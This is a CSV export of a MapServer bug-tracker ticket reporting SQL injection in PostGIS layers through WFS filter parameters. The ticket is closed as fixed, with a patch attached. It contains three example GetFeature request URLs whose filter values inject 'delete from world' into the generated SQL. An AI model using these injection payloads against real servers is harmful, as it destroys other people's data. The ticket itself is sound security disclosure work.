id,summary,reporter,owner,description,type,status,priority,milestone,component,version,severity,resolution,keywords,cc 3874,Multiple SQL injections possible on PostGIS layers with a WFS FE filter,rouault,assefa,"I've been able to trigger a SQL injection with svn trunk when running the following WFS GetFeature request : {{{ http://127.0.0.1:8080/mapserv.cgi?map=pg.map&SERVICE=WFS&VERSION=1.1.0&REQUEST=GetFeature&TYPENAME=world& FILTER=name ')); delete from world; select ((' msGeometry -90,-180 90,180 }}} The 'delete from world' is run... Also with the Literal of a PropertyIsLike : {{{ http://127.0.0.1:8080/mapserv.cgi?map=pg.map&SERVICE=WFS& VERSION=1.1.0&REQUEST=GetFeature&TYPENAME=world& FILTER= name ')); delete from world; select name from world WHERE ((name LIKE ' msGeometry-90,-180 90,180 }}} Also with the PropertyName : {{{ map=pg.map&SERVICE=WFS&VERSION=1.1.0&REQUEST=GetFeature& TYPENAME=world&FILTER= name = 'a')); delete from world; select * from world where ((name amsGeometry-90,-180 90,180 }}} FLTGetIsBetweenComparisonSQLExpresssion() seems to be unaffected as far as the UpperBound and LowerBound are concerned because of the following check : {{{ aszBounds = msStringSplit(psFilterNode->psRightNode->pszValue, ';', &nBounds); if (nBounds != 2) return NULL; }}} However there are perhaps more clever ways of exploiting it despite that. The issue likely affects previous MS versions, and perhaps other backends, and perhaps other places in the code I haven't seen. Attached a patch that fixes the issue, but it is not perfect. See comment in the patch.",defect,closed,normal,6.0.1 release,Security/Vulnerability (Private),svn-trunk (development),normal,fixed,,aboudreault assefa sdlime dmorissette pramsey colivier msmitherdc